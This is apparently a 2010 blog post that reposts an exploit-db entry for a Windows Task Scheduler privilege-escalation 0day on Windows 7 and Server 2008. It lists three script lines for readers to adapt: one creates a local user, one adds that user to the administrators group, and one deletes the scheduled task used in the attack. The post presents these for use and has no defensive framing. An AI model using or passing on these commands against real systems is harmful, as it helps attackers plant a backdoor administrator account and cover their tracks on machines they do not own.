Saturday, December 4, 2010

Windows Task Scheduler Privilege Escalation 0day

" I can't tell you why there's a delay, but stick your head out of the window and you'll know why." - Dizzy Dean


I found this error in http://www.exploit-db.com/exploits/15589/
I test succeful on windows server 2008 R2.

# Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64

You replace this 3 line. With user your computer. (This is User = test123)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")

Source: http://www.exploit-db.com/exploits/15589/
thanks!



No comments:

Post a Comment